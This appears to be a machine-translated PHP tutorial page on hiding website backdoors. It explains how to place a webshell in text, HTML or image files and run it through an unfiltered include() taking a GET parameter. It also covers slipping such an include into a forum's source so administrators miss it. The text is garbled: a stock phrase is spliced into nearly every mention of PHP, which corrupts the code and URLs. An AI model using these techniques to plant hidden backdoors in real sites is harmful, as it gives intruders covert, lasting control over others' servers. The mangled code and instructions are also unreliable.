Home >Backend Development >PHP Tutorial >Test Report on Hidden Tricks for PHP Website Backdoor_PHP Tutorial

Test Report on Hidden Tricks for PHP Website Backdoor_PHP Tutorial

WBOY
WBOYOriginal
2016-07-13 17:32:281013browse

You must know that if you just put the php (as the current mainstream development language) statement into the image, it will not be executed anyway, because php (as the current mainstream development language) )Only parses files with the extension php(as the current mainstream development language). Therefore, it is necessary to be able to execute the php (as the current mainstream development language) statement hidden in the image. We just use the calling functions in php(as the current mainstream development language): include, require, etc.

We still remember the article about hiding Trojans in pictures a few days ago. That is, in the php(as the current mainstream development language) file, use statements such as include("x.gif") to call the Trojan horse statements hidden in the image. The statements in ASP are similar. It seems very hidden, but it is not difficult for people who know a little about php(as the current mainstream development language) to directly call the image to find something suspicious. Since it is difficult to pass parameters using the GET method in the URL, the performance of the Trojan insertion cannot be fully utilized.

The include function is used more frequently in php(as the current mainstream development language), so it causes too many security issues, such as php(as the current mainstream development language) Mainstream development languages)The vulnerability of WIND1.36 is caused by the fact that the variables behind include are not filtered. From this, we can construct similar statements to insert into the php (as the current mainstream development language) file. Then hide the Trojan in a picture or HTML file, which can be said to be more concealed. For example, insert the following statement in php(as the current mainstream development language) in the WIND forum: <''?@include include/.$php(as the current mainstream development language)WIND_ROOT;? <mailto:?@include includ/.$php(as the current mainstream development language)WIND_ROOT;?>>General administrators cannot see it.

With the help of the include function, we can hide the php(as the current mainstream development language) Trojan into many types of files such as txt, html and image files. . Because these three types of files, txt, html and image files, are the most common in forums and article systems, we will do the tests in order below.

First create a php (as the current mainstream development language) file test.php (as the current mainstream development language) The content of the file is:

<?php(as the current mainstream development language)
$test=$_GET[test];
@include test/.$test;
?>

Txt files are generally description files, so we can put the one-sentence Trojan in the description file of the directory. Just create a TXT file t.txt. We paste the sentence Trojan into the t.txt file. Then visit http://localhost/test/test.php(as the current mainstream development language)?test=../t.txt <http://localhost/php(do As the current mainstream development language)w/index.php(As the current mainstream development language)?php(As the current mainstream development language)WIND_ROOT=. ./robots.txt> If you see the content of t.txt, it’s OK. Then add the backdoor client Trojan address in lanker microphp (as the current mainstream development language) to http: //localhost/test/test.php(as the current mainstream development language)?test=../t.txt <http://localhost/php(as the current mainstream development language) Development language)w/index.php(as the current mainstream development language)?php(as the current mainstream development language)WIND_ROOT=../robots. txt> Just add cmd to the password, and you can see the results returned by execution.

For HTML files, they are generally template files. In order to enable the Trojan horse inserted into the HTML file to be called and executed without being displayed, we can add a text box with hidden attributes in the HTML, such as: I can get the directory as C:Uniserver2_7swww est.

www.bkjia.comtruehttp: //www.bkjia.com/PHPjc/508706.htmlTechArticleYou must know that if you just put PHP (as the current mainstream development language) statements into the picture, it will be useless anyway. It cannot be executed because PHP (as the current mainstream development language) only parses extensions...
Statement:
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn